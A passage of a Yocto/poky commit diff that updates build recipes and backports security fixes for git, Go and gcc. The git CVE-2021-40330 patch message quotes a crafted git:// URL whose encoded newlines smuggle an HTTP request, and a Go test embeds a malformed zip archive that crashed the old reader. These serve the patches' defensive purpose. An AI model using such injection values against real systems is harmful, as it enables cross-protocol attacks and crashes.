e2fsprogs-tune2fs" +PACKAGES =+ "libcomerr libss libe2p libext2fs" + +FILES_e2fsprogs-dumpe2fs = "${base_sbindir}/dumpe2fs" +FILES_e2fsprogs-resize2fs = "${base_sbindir}/resize2fs*" +FILES_e2fsprogs-e2fsck = "${base_sbindir}/e2fsck ${base_sbindir}/fsck.ext*" +FILES_e2fsprogs-e2scrub = "${base_sbindir}/e2scrub*" +FILES_e2fsprogs-mke2fs = "${base_sbindir}/mke2fs.e2fsprogs ${base_sbindir}/mkfs.ext* ${sysconfdir}/mke2fs.conf" +FILES_e2fsprogs-tune2fs = "${base_sbindir}/tune2fs.e2fsprogs ${base_sbindir}/e2label" +FILES_e2fsprogs-badblocks = "${base_sbindir}/badblocks" +FILES_libcomerr = "${base_libdir}/libcom_err.so.*" +FILES_libss = "${base_libdir}/libss.so.*" +FILES_libe2p = "${base_libdir}/libe2p.so.*" +FILES_libext2fs = "${libdir}/e2initrd_helper ${base_libdir}/libext2fs.so.*" +FILES_${PN}-dev += "${datadir}/*/*.awk ${datadir}/*/*.sed ${base_libdir}/*.so ${bindir}/compile_et ${bindir}/mk_cmds" + +ALTERNATIVE_${PN} = "chattr" +ALTERNATIVE_PRIORITY = "100" +ALTERNATIVE_LINK_NAME[chattr] = "${base_bindir}/chattr" +ALTERNATIVE_TARGET[chattr] = "${base_bindir}/chattr.e2fsprogs" + +ALTERNATIVE_${PN}-doc = "fsck.8" +ALTERNATIVE_LINK_NAME[fsck.8] = "${mandir}/man8/fsck.8" + +ALTERNATIVE_${PN}-mke2fs = "mke2fs mkfs.ext2" +ALTERNATIVE_LINK_NAME[mke2fs] = "${base_sbindir}/mke2fs" +ALTERNATIVE_LINK_NAME[mkfs.ext2] = "${base_sbindir}/mkfs.ext2" + +ALTERNATIVE_${PN}-tune2fs = "tune2fs" +ALTERNATIVE_LINK_NAME[tune2fs] = "${base_sbindir}/tune2fs" + +RDEPENDS_e2fsprogs-e2scrub = "bash" +RDEPENDS_${PN}-ptest += "coreutils procps bash bzip2 diffutils perl sed" +RDEPENDS_${PN}-ptest += "e2fsprogs-badblocks e2fsprogs-dumpe2fs e2fsprogs-e2fsck e2fsprogs-mke2fs e2fsprogs-resize2fs e2fsprogs-tune2fs" + +do_compile_ptest() { + oe_runmake -C ${B}/tests +} + +do_install_ptest() { + # This file's permissions depends on the host umask so be deterministic + chmod 0644 ${B}/tests/test_data.tmp + cp -R --no-dereference --preserve=mode,links -v ${B}/tests ${D}${PTEST_PATH}/test + cp -R --no-dereference --preserve=mode,links -v ${S}/tests/* ${D}${PTEST_PATH}/test + sed -e 's!../e2fsck/e2fsck!e2fsck!g' \ + -e 's!../misc/tune2fs!tune2fs!g' -i ${D}${PTEST_PATH}/test/*/expect* + sed -e 's!../e2fsck/e2fsck!${base_sbindir}/e2fsck!g' -i ${D}${PTEST_PATH}/test/*/script + + # Remove various files + find "${D}${PTEST_PATH}" -type f \ + \( -name 'Makefile' -o -name 'Makefile.in' -o -name '*.o' -o -name '*.c' -o -name '*.h' \)\ + -exec rm -f {} + + + install -d ${D}${PTEST_PATH}/lib + install -m 0644 ${B}/lib/config.h ${D}${PTEST_PATH}/lib/ +} diff --git a/poky/meta/recipes-devtools/file/file_5.38.bb b/poky/meta/recipes-devtools/file/file_5.38.bb index 2d62ead10b..b19bf03986 100644 --- a/poky/meta/recipes-devtools/file/file_5.38.bb +++ b/poky/meta/recipes-devtools/file/file_5.38.bb @@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;beginline=2;md5=0251eaec1188b20d9a72c502ecfdd DEPENDS = "file-replacement-native" DEPENDS_class-native = "bzip2-replacement-native" -SRC_URI = "git://github.com/file/file.git" +SRC_URI = "git://github.com/file/file.git;branch=master;protocol=https" SRCREV = "ec41083645689a787cdd00cb3b5bf578aa79e46c" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-devtools/flex/flex_2.6.4.bb b/poky/meta/recipes-devtools/flex/flex_2.6.4.bb index 1d43d2228a..50d3bf8de1 100644 --- a/poky/meta/recipes-devtools/flex/flex_2.6.4.bb +++ b/poky/meta/recipes-devtools/flex/flex_2.6.4.bb @@ -26,6 +26,11 @@ SRC_URI[sha256sum] = "e87aae032bf07c26f85ac0ed3250998c37621d95f8bd748b31f15b33c4 UPSTREAM_CHECK_URI = "https://github.com/westes/flex/releases" UPSTREAM_CHECK_REGEX = "flex-(?P\d+(\.\d+)+)\.tar" +# Disputed - yes there is stack exhaustion but no bug and it is building the +# parser, not running it, effectively similar to a compiler ICE. Upstream no plans to address +# https://github.com/westes/flex/issues/414 +CVE_CHECK_WHITELIST += "CVE-2019-6293" + inherit autotools gettext texinfo ptest M4 = "${bindir}/m4" diff --git a/poky/meta/recipes-devtools/gcc/gcc-9.3.inc b/poky/meta/recipes-devtools/gcc/gcc-9.3.inc index 1c8e3df51d..c171f673e9 100644 --- a/poky/meta/recipes-devtools/gcc/gcc-9.3.inc +++ b/poky/meta/recipes-devtools/gcc/gcc-9.3.inc @@ -69,6 +69,7 @@ SRC_URI = "\ file://0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch \ file://0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch \ file://0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch \ + file://0040-fix-missing-dependencies-for-selftests.patch \ file://0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch \ file://0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch \ file://0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch \ @@ -123,3 +124,6 @@ EXTRA_OECONF_PATHS = "\ --with-sysroot=/not/exist \ --with-build-sysroot=${STAGING_DIR_TARGET} \ " + +# Is a binutils 2.26 issue, not gcc +CVE_CHECK_WHITELIST += "CVE-2021-37322" diff --git a/poky/meta/recipes-devtools/gcc/gcc-9.3/0040-fix-missing-dependencies-for-selftests.patch b/poky/meta/recipes-devtools/gcc/gcc-9.3/0040-fix-missing-dependencies-for-selftests.patch new file mode 100644 index 0000000000..c8960c6098 --- /dev/null +++ b/poky/meta/recipes-devtools/gcc/gcc-9.3/0040-fix-missing-dependencies-for-selftests.patch @@ -0,0 +1,45 @@ +From b19d8aac15649f31a7588b2634411a1922906ea8 Mon Sep 17 00:00:00 2001 +From: Romain Naour +Date: Wed, 3 Jun 2020 12:30:57 -0600 +Subject: [PATCH] Fix missing dependencies for selftests which occasionally + causes failed builds. + +gcc/ + + * Makefile.in (SELFTEST_DEPS): Move before including language makefile + fragments. + +Upstream-Status: Backport [https://gcc.gnu.org/git/?p=gcc.git;a=commitdiff;h=b19d8aac15649f31a7588b2634411a1922906ea8] +Signed-off-by:Steve Sakoman + +--- + gcc/Makefile.in | 6 ++++-- + 1 file changed, 4 insertions(+), 2 deletions(-) + +diff --git a/gcc/Makefile.in b/gcc/Makefile.in +index aab1dbba57b..be11311b60d 100644 +--- a/gcc/Makefile.in ++++ b/gcc/Makefile.in +@@ -1735,6 +1735,10 @@ $(FULL_DRIVER_NAME): ./xgcc$(exeext) + $(LN_S) $< $@ + + # ++# SELFTEST_DEPS need to be set before including language makefile fragments. ++# Otherwise $(SELFTEST_DEPS) is empty when used from /Make-lang.in. ++SELFTEST_DEPS = $(GCC_PASSES) stmp-int-hdrs $(srcdir)/testsuite/selftests ++ + # Language makefile fragments. + + # The following targets define the interface between us and the languages. +@@ -2010,8 +2014,6 @@ DEVNULL=$(if $(findstring mingw,$(build)),nul,/dev/null) + SELFTEST_FLAGS = -nostdinc $(DEVNULL) -S -o $(DEVNULL) \ + -fself-test=$(srcdir)/testsuite/selftests + +-SELFTEST_DEPS = $(GCC_PASSES) stmp-int-hdrs $(srcdir)/testsuite/selftests +- + # Run the selftests during the build once we have a driver and the frontend, + # so that self-test failures are caught as early as possible. + # Use "s-selftest-FE" to ensure that we only run the selftests if the +-- +2.27.0 + diff --git a/poky/meta/recipes-devtools/git/files/CVE-2021-40330.patch b/poky/meta/recipes-devtools/git/files/CVE-2021-40330.patch new file mode 100644 index 0000000000..725f98f0b7 --- /dev/null +++ b/poky/meta/recipes-devtools/git/files/CVE-2021-40330.patch @@ -0,0 +1,108 @@ +From e77ca0c7d577408878d2b3e8c7336e6119cb3931 Mon Sep 17 00:00:00 2001 +From: Minjae Kim +Date: Thu, 25 Nov 2021 06:36:26 +0000 +Subject: [PATCH] git_connect_git(): forbid newlines in host and path + +When we connect to a git:// server, we send an initial request that +looks something like: + + 002dgit-upload-pack repo.git\0host=example.com + +If the repo path contains a newline, then it's included literally, and +we get: + + 002egit-upload-pack repo + .git\0host=example.com + +This works fine if you really do have a newline in your repository name; +the server side uses the pktline framing to parse the string, not +newlines. However, there are many _other_ protocols in the wild that do +parse on newlines, such as HTTP. So a carefully constructed git:// URL +can actually turn into a valid HTTP request. For example: + + git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 %0d%0aHost:localhost%0d%0a%0d%0a + +becomes: + + 0050git-upload-pack / + GET / HTTP/1.1 + Host:localhost + + host=localhost:1234 + +on the wire. Again, this isn't a problem for a real Git server, but it +does mean that feeding a malicious URL to Git (e.g., through a +submodule) can cause it to make unexpected cross-protocol requests. +Since repository names with newlines are presumably quite rare (and +indeed, we already disallow them in git-over-http), let's just disallow +them over this protocol. + +Hostnames could likewise inject a newline, but this is unlikely a +problem in practice; we'd try resolving the hostname with a newline in +it, which wouldn't work. Still, it doesn't hurt to err on the side of +caution there, since we would not expect them to work in the first +place. + +The ssh and local code paths are unaffected by this patch. In both cases +we're trying to run upload-pack via a shell, and will quote the newline +so that it makes it intact. An attacker can point an ssh url at an +arbitrary port, of course, but unless there's an actual ssh server +there, we'd never get as far as sending our shell command anyway. We +_could_ similarly restrict newlines in those protocols out of caution, +but there seems little benefit to doing so. + +The new test here is run alongside the git-daemon tests, which cover the +same protocol, but it shouldn't actually contact the daemon at all. In +theory we could make the test more robust by setting up an actual +repository with a newline in it (so that our clone would succeed if our +new check didn't kick in). But a repo directory with newline in it is +likely not portable across all filesystems. Likewise, we could check +git-daemon's log that it was not contacted at all, but we do not +currently record the log (and anyway, it would make the test racy with +the daemon's log write). We'll just check the client-side stderr to make +sure we hit the expected code path. + +Reported-by: Harold Kim +Signed-off-by: Jeff King +Signed-off-by: Junio C Hamano + +Upstream-Status: Backported [https://github.com/git/git/commit/a02ea577174ab8ed18f847cf1693f213e0b9c473] +CVE: CVE-2021-40330 +Signed-off-by: Minjae Kim +--- + connect.c | 2 ++ + t/t5570-git-daemon.sh | 5 +++++ + 2 files changed, 7 insertions(+) + +diff --git a/connect.c b/connect.c +index b6451ab..929de9a 100644 +--- a/connect.c ++++ b/connect.c +@@ -1064,6 +1064,8 @@ static struct child_process *git_connect_git(int fd[2], char *hostandport, + target_host = xstrdup(hostandport); + + transport_check_allowed("git"); ++ if (strchr(target_host, '\n') || strchr(path, '\n')) ++ die(_("newline is forbidden in git:// hosts and repo paths")); + + /* + * These underlying connection commands die() if they +diff --git a/t/t5570-git-daemon.sh b/t/t5570-git-daemon.sh +index 34487bb..79cd218 100755 +--- a/t/t5570-git-daemon.sh ++++ b/t/t5570-git-daemon.sh +@@ -103,6 +103,11 @@ test_expect_success 'fetch notices corrupt idx' ' + ) + ' + ++test_expect_success 'client refuses to ask for repo with newline' ' ++ test_must_fail git clone "$GIT_DAEMON_URL/repo$LF.git" dst 2>stderr && ++ test_i18ngrep newline.is.forbidden stderr ++' ++ + test_remote_error() + { + do_export=YesPlease +-- +2.17.1 + diff --git a/poky/meta/recipes-devtools/git/git.inc b/poky/meta/recipes-devtools/git/git.inc index 738a429875..a89dd42e8b 100644 --- a/poky/meta/recipes-devtools/git/git.inc +++ b/poky/meta/recipes-devtools/git/git.inc @@ -10,7 +10,9 @@ PROVIDES_append_class-native = " git-replacement-native" SRC_URI = "${KERNELORG_MIRROR}/software/scm/git/git-${PV}.tar.gz;name=tarball \ ${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages \ file://CVE-2021-21300.patch \ -" + file://fixsort.patch \ + file://CVE-2021-40330.patch \ + " S = "${WORKDIR}/git-${PV}" diff --git a/poky/meta/recipes-devtools/git/git/fixsort.patch b/poky/meta/recipes-devtools/git/git/fixsort.patch new file mode 100644 index 0000000000..eec1f84945 --- /dev/null +++ b/poky/meta/recipes-devtools/git/git/fixsort.patch @@ -0,0 +1,36 @@ +[PATCH] generate-cmdlist.sh: Fix determinism issue + +Currently git binaries are not entirely reproducible, at least partly +due to config-list.h differing in order depending on the system's +locale settings. Under different locales, the entries: + +"sendemail.identity", +"sendemail..*", + +would differ in order for example and this leads to differences in +the debug symbols for the binaries. + +This can be fixed by specifying the C locale for the sort in the +shell script generating the header. + +Note: This is a backport of Richard Purdie's original patch for a more +recent version of git. The offending code in this older version is +in generate-cmdlist.sh. The upstream current version has this code +in generate-configlist.sh. + +Signed-off-by: Richard Purdie +Signed-off-by: Steve Sakoman +Upstream-Status: Submitted [https://public-inbox.org/git/f029a942dd3d50d85e60bd37d8e454524987842f.camel@linuxfoundation.org/T/#u] + +index 71158f7..c137091 100755 +--- a/generate-cmdlist.sh ++++ b/generate-cmdlist.sh +@@ -82,7 +82,7 @@ static const char *config_name_list[] = { + EOF + grep -h '^[a-zA-Z].*\..*::$' Documentation/*config.txt Documentation/config/*.txt | + sed '/deprecated/d; s/::$//; s/, */\n/g' | +- sort | ++ LC_ALL=C sort | + while read line + do + echo " \"$line\"," diff --git a/poky/meta/recipes-devtools/glide/glide_0.13.3.bb b/poky/meta/recipes-devtools/glide/glide_0.13.3.bb index 6eb87df7c3..21773d91f9 100644 --- a/poky/meta/recipes-devtools/glide/glide_0.13.3.bb +++ b/poky/meta/recipes-devtools/glide/glide_0.13.3.bb @@ -5,7 +5,7 @@ LICENSE = "MIT" LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=54905cf894f8cc416a92f4fc350c35b2" GO_IMPORT = "github.com/Masterminds/glide" -SRC_URI = "git://${GO_IMPORT}" +SRC_URI = "git://${GO_IMPORT};branch=master" SRCREV = "8ed5b9292379d86c39592a7e6a58eb9c903877cf" inherit go diff --git a/poky/meta/recipes-devtools/gnu-config/gnu-config_git.bb b/poky/meta/recipes-devtools/gnu-config/gnu-config_git.bb index 7299a1d4a4..df8947e425 100644 --- a/poky/meta/recipes-devtools/gnu-config/gnu-config_git.bb +++ b/poky/meta/recipes-devtools/gnu-config/gnu-config_git.bb @@ -12,7 +12,7 @@ INHIBIT_DEFAULT_DEPS = "1" SRCREV = "5256817ace8493502ec88501a19e4051c2e220b0" PV = "20200117+git${SRCPV}" -SRC_URI = "git://git.savannah.gnu.org/config.git \ +SRC_URI = "git://git.savannah.gnu.org/config.git;branch=master \ file://gnu-configize.in" S = "${WORKDIR}/git" UPSTREAM_CHECK_COMMITS = "1" diff --git a/poky/meta/recipes-devtools/go/go-1.14.inc b/poky/meta/recipes-devtools/go/go-1.14.inc index 3dfd671d11..abc6f42184 100644 --- a/poky/meta/recipes-devtools/go/go-1.14.inc +++ b/poky/meta/recipes-devtools/go/go-1.14.inc @@ -16,6 +16,15 @@ SRC_URI += "\ file://0006-cmd-dist-separate-host-and-target-builds.patch \ file://0007-cmd-go-make-GOROOT-precious-by-default.patch \ file://0008-use-GOBUILDMODE-to-set-buildmode.patch \ + file://CVE-2021-34558.patch \ + file://CVE-2021-33196.patch \ + file://CVE-2021-33197.patch \ " SRC_URI_append_libc-musl = " file://0009-ld-replace-glibc-dynamic-linker-with-musl.patch" SRC_URI[main.sha256sum] = "7ed13b2209e54a451835997f78035530b331c5b6943cdcd68a3d815fdc009149" + +# Upstream don't believe it is a signifiant real world issue and will only +# fix in 1.17 onwards where we can drop this. +# https://github.com/golang/go/issues/30999#issuecomment-910470358 +CVE_CHECK_WHITELIST += "CVE-2021-29923" + diff --git a/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch b/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch new file mode 100644 index 0000000000..2e2dc62c49 --- /dev/null +++ b/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch @@ -0,0 +1,124 @@ +From 74242baa4136c7a9132a8ccd9881354442788c8c Mon Sep 17 00:00:00 2001 +From: Roland Shoemaker +Date: Tue, 11 May 2021 11:31:31 -0700 +Subject: [PATCH] archive/zip: only preallocate File slice if reasonably sized + +Since the number of files in the EOCD record isn't validated, it isn't +safe to preallocate Reader.Files using that field. A malformed archive +can indicate it contains up to 1 << 128 - 1 files. We can still safely +preallocate the slice by checking if the specified number of files in +the archive is reasonable, given the size of the archive. + +Thanks to the OSS-Fuzz project for discovering this issue and to +Emmanuel Odeke for reporting it. + +Fixes #46242 +Fixes CVE-2021-33196 + +Change-Id: I3c76d8eec178468b380d87fdb4a3f2cb06f0ee76 +Reviewed-on: https://go-review.googlesource.com/c/go/+/318909 +Trust: Roland Shoemaker +Trust: Katie Hockman +Trust: Joe Tsai +Run-TryBot: Roland Shoemaker +TryBot-Result: Go Bot +Reviewed-by: Katie Hockman +Reviewed-by: Joe Tsai + +Upstream-Status: Backport +CVE: CVE-2021-33196 +Signed-off-by: Armin Kuster + +--- + src/archive/zip/reader.go | 10 +++++- + src/archive/zip/reader_test.go | 59 ++++++++++++++++++++++++++++++++++ + 2 files changed, 68 insertions(+), 1 deletion(-) + +Index: go/src/archive/zip/reader.go +=================================================================== +--- go.orig/src/archive/zip/reader.go ++++ go/src/archive/zip/reader.go +@@ -84,7 +84,15 @@ func (z *Reader) init(r io.ReaderAt, siz + return err + } + z.r = r +- z.File = make([]*File, 0, end.directoryRecords) ++ // Since the number of directory records is not validated, it is not ++ // safe to preallocate z.File without first checking that the specified ++ // number of files is reasonable, since a malformed archive may ++ // indicate it contains up to 1 << 128 - 1 files. Since each file has a ++ // header which will be _at least_ 30 bytes we can safely preallocate ++ // if (data size / 30) >= end.directoryRecords. ++ if (uint64(size)-end.directorySize)/30 >= end.directoryRecords { ++ z.File = make([]*File, 0, end.directoryRecords) ++ } + z.Comment = end.comment + rs := io.NewSectionReader(r, 0, size) + if _, err = rs.Seek(int64(end.directoryOffset), io.SeekStart); err != nil { +Index: go/src/archive/zip/reader_test.go +=================================================================== +--- go.orig/src/archive/zip/reader_test.go ++++ go/src/archive/zip/reader_test.go +@@ -1070,3 +1070,62 @@ func TestIssue12449(t *testing.T) { + t.Errorf("Error reading the archive: %v", err) + } + } ++ ++func TestCVE202133196(t *testing.T) { ++ // Archive that indicates it has 1 << 128 -1 files, ++ // this would previously cause a panic due to attempting ++ // to allocate a slice with 1 << 128 -1 elements. ++ data := []byte{ ++ 0x50, 0x4b, 0x03, 0x04, 0x14, 0x00, 0x08, 0x08, ++ 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x01, 0x02, ++ 0x03, 0x62, 0x61, 0x65, 0x03, 0x04, 0x00, 0x00, ++ 0xff, 0xff, 0x50, 0x4b, 0x07, 0x08, 0xbe, 0x20, ++ 0x5c, 0x6c, 0x09, 0x00, 0x00, 0x00, 0x03, 0x00, ++ 0x00, 0x00, 0x50, 0x4b, 0x01, 0x02, 0x14, 0x00, ++ 0x14, 0x00, 0x08, 0x08, 0x08, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0xbe, 0x20, 0x5c, 0x6c, 0x09, 0x00, ++ 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, ++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x01, 0x02, 0x03, 0x50, 0x4b, 0x06, 0x06, 0x2c, ++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d, ++ 0x00, 0x2d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff, ++ 0xff, 0xff, 0xff, 0x31, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x3a, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x50, 0x4b, 0x06, 0x07, 0x00, ++ 0x00, 0x00, 0x00, 0x6b, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x50, ++ 0x4b, 0x05, 0x06, 0x00, 0x00, 0x00, 0x00, 0xff, ++ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, ++ 0xff, 0xff, 0xff, 0x00, 0x00, ++ } ++ _, err := NewReader(bytes.NewReader(data), int64(len(data))) ++ if err != ErrFormat { ++ t.Fatalf("unexpected error, got: %v, want: %v", err, ErrFormat) ++ } ++ ++ // Also check that an archive containing a handful of empty ++ // files doesn't cause an issue ++ b := bytes.NewBuffer(nil) ++ w := NewWriter(b) ++ for i := 0; i < 5; i++ { ++ _, err := w.Create("") ++ if err != nil { ++ t.Fatalf("Writer.Create failed: %s", err) ++ } ++ } ++ if err := w.Close(); err != nil { ++ t.Fatalf("Writer.Close failed: %s", err) ++ } ++ r, err := NewReader(bytes.NewReader(b.Bytes()), int64(b.Len())) ++ if err != nil { ++ t.Fatalf("NewReader failed: %s", err) ++ } ++ if len(r.File) != 5 { ++ t.Errorf("Archive has unexpected number of files, got %d, want 5", len(r.File)) ++ } ++} diff --git a/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch b/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch new file mode 100644 index 0000000000..2052b1d3db --- /dev/null +++ b/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch @@ -0,0 +1,152 @@ +From cbd1ca84453fecf3825a6bb9f985823e8bc32b76 Mon Sep 17 00:00:00 2001 +From: Filippo Valsorda +Date: Fri, 21 May 2021 14:02:30 -0400 +Subject: [PATCH] [release-branch.go1.15] net/http/httputil: always remove + hop-by-hop headers + +Previously, we'd fail to remove the Connection header from a request +like this: + + Connection: + Connection: x-header + +Updates #46313 +Fixes #46314 +Fixes CVE-2021-33197 + +Change-Id: Ie3009e926ceecfa86dfa6bcc6fe14ff01086be7d +Reviewed-on: https://go-review.googlesource.com/c/go/+/321929 +Run-TryBot: Filippo Valsorda +Reviewed-by: Katie Hockman +Trust: Katie Hockman +Trust: Filippo Valsorda +TryBot-Result: Go Bot +Reviewed-on: https://go-review.googlesource.com/c/go/+/323091 +Run-TryBot: Katie Hockman + +Upstream-Status: Backport +CVE: CVE-2021-33197 +Signed-off-by: Armin Kuster + +--- + src/net/http/httputil/reverseproxy.go | 22 ++++---- + src/net/http/httputil/reverseproxy_test.go | 63 +++++++++++++++++++++- + 2 files changed, 70 insertions(+), 15 deletions(-) + +Index: go/src/net/http/httputil/reverseproxy.go +=================================================================== +--- go.orig/src/net/http/httputil/reverseproxy.go ++++ go/src/net/http/httputil/reverseproxy.go +@@ -221,22 +221,18 @@ func (p *ReverseProxy) ServeHTTP(rw http + // important is "Connection" because we want a persistent + // connection, regardless of what the client sent to us. + for _, h := range hopHeaders { +- hv := outreq.Header.Get(h) +- if hv == "" { +- continue +- } +- if h == "Te" && hv == "trailers" { +- // Issue 21096: tell backend applications that +- // care about trailer support that we support +- // trailers. (We do, but we don't go out of +- // our way to advertise that unless the +- // incoming client request thought it was +- // worth mentioning) +- continue +- } + outreq.Header.Del(h) + } + ++ // Issue 21096: tell backend applications that care about trailer support ++ // that we support trailers. (We do, but we don't go out of our way to ++ // advertise that unless the incoming client request thought it was worth ++ // mentioning.) Note that we look at req.Header, not outreq.Header, since ++ // the latter has passed through removeConnectionHeaders. ++ if httpguts.HeaderValuesContainsToken(req.Header["Te"], "trailers") { ++ outreq.Header.Set("Te", "trailers") ++ } ++ + // After stripping all the hop-by-hop connection headers above, add back any + // necessary for protocol upgrades, such as for websockets. + if reqUpType != "" { +Index: go/src/net/http/httputil/reverseproxy_test.go +=================================================================== +--- go.orig/src/net/http/httputil/reverseproxy_test.go ++++ go/src/net/http/httputil/reverseproxy_test.go +@@ -91,8 +91,9 @@ func TestReverseProxy(t *testing.T) { + + getReq, _ := http.NewRequest("GET", frontend.URL, nil) + getReq.Host = "some-name" +- getReq.Header.Set("Connection", "close") +- getReq.Header.Set("Te", "trailers") ++ getReq.Header.Set("Connection", "close, TE") ++ getReq.Header.Add("Te", "foo") ++ getReq.Header.Add("Te", "bar, trailers") + getReq.Header.Set("Proxy-Connection", "should be deleted") + getReq.Header.Set("Upgrade", "foo") + getReq.Close = true +@@ -236,6 +237,64 @@ func TestReverseProxyStripHeadersPresent + } + } + ++func TestReverseProxyStripEmptyConnection(t *testing.T) { ++ // See Issue 46313. ++ const backendResponse = "I am the backend" ++ ++ // someConnHeader is some arbitrary header to be declared as a hop-by-hop header ++ // in the Request's Connection header. ++ const someConnHeader = "X-Some-Conn-Header" ++ ++ backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { ++ if c := r.Header.Values("Connection"); len(c) != 0 { ++ t.Errorf("handler got header %q = %v; want empty", "Connection", c) ++ } ++ if c := r.Header.Get(someConnHeader); c != "" { ++ t.Errorf("handler got header %q = %q; want empty", someConnHeader, c) ++ } ++ w.Header().Add("Connection", "") ++ w.Header().Add("Connection", someConnHeader) ++ w.Header().Set(someConnHeader, "should be deleted") ++ io.WriteString(w, backendResponse) ++ })) ++ defer backend.Close() ++ backendURL, err := url.Parse(backend.URL) ++ if err != nil { ++ t.Fatal(err) ++ } ++ proxyHandler := NewSingleHostReverseProxy(backendURL) ++ frontend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { ++ proxyHandler.ServeHTTP(w, r) ++ if c := r.Header.Get(someConnHeader); c != "should be deleted" { ++ t.Errorf("handler modified header %q = %q; want %q", someConnHeader, c, "should be deleted") ++ } ++ })) ++ defer frontend.Close() ++ ++ getReq, _ := http.NewRequest("GET", frontend.URL, nil) ++ getReq.Header.Add("Connection", "") ++ getReq.Header.Add("Connection", someConnHeader) ++ getReq.Header.Set(someConnHeader, "should be deleted") ++ res, err := frontend.Client().Do(getReq) ++ if err != nil { ++ t.Fatalf("Get: %v", err) ++ } ++ defer res.Body.Close() ++ bodyBytes, err := ioutil.ReadAll(res.Body) ++ if err != nil { ++ t.Fatalf("reading body: %v", err) ++ } ++ if got, want := string(bodyBytes), backendResponse; got != want { ++ t.Errorf("got body %q; want %q", got, want) ++ } ++ if c := res.Header.Get("Connection"); c != "" { ++ t.Errorf("handler got header %q = %q; want empty", "Connection", c) ++ } ++ if c := res.Header.Get(someConnHeader); c != "" { ++ t.Errorf("handler got header %q = %q; want empty", someConnHeader, c) ++ } ++} ++ + func TestXForwardedFor(t *testing.T) { + const prevForwardedFor = "client ip" + const backendResponse = "I am the backend" diff --git a/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch b/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch new file mode 100644 index 0000000000..8fb346d622 --- /dev/null +++ b/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch @@ -0,0 +1,51 @@ +From a98589711da5e9d935e8d690cfca92892e86d557 Mon Sep 17 00:00:00 2001 +From: Roland Shoemaker +Date: Wed, 9 Jun 2021 11:31:27 -0700 +Subject: [PATCH] crypto/tls: test key type when casting + +When casting the certificate public key in generateClientKeyExchange, +check the type is appropriate. This prevents a panic when a server +agrees to a RSA based key exchange, but then sends an ECDSA (or +other) certificate. + +Fixes #47143 +Fixes CVE-2021-34558 + +Thanks to Imre Rad for reporting this issue. + +Change-Id: Iabccacca6052769a605cccefa1216a9f7b7f6aea +Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1116723 +Reviewed-by: Filippo Valsorda +Reviewed-by: Katie Hockman +Reviewed-on: https://go-review.googlesource.com/c/go/+/334031 +Trust: Filippo Valsorda +Run-TryBot: Filippo Valsorda +TryBot-Result: Go Bot +Reviewed-by: Dmitri Shuralyov + +Upstream-Status: Backport +https://github.com/golang/go/commit/a98589711da5e9d935e8d690cfca92892e86d557 +CVE: CVE-2021-34558 +Signed-off-by: Armin Kuster + +--- + src/crypto/tls/key_agreement.go | 6 +++++- + 1 file changed, 5 insertions(+), 1 deletion(-) + +Index: go/src/crypto/tls/key_agreement.go +=================================================================== +--- go.orig/src/crypto/tls/key_agreement.go ++++ go/src/crypto/tls/key_agreement.go +@@ -67,7 +67,11 @@ func (ka rsaKeyAgreement) generateClient + return nil, nil, err + } + +- encrypted, err := rsa.EncryptPKCS1v15(config.rand(), cert.PublicKey.(*rsa.PublicKey), preMasterSecret) ++ rsaKey, ok := cert.PublicKey.(*rsa.PublicKey) ++ if !ok { ++ return nil, nil, errors.New("tls: server certificate contains incorrect key type for selected ciphersuite") ++ } ++ encrypted, err := rsa.EncryptPKCS1v15(config.rand(), rsaKey, preMasterSecret) + if err != nil { + return nil, nil, err + } diff --git a/poky/meta/recipes-devtools/go/go-dep_0.5.4.bb b/poky/meta/recipes-devtools/go/go-dep_0.5.4.bb index 0da2c6607c..e29e53433e 100644 --- a/poky/meta/recipes-devtools/go/go-dep_0.5.4.bb +++ b/poky/meta/recipes-devtools/go/go-dep_0.5.4.bb @@ -4,7 +4,7 @@ LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=1bad315647751fab0007812f70d42c0d" GO_IMPORT 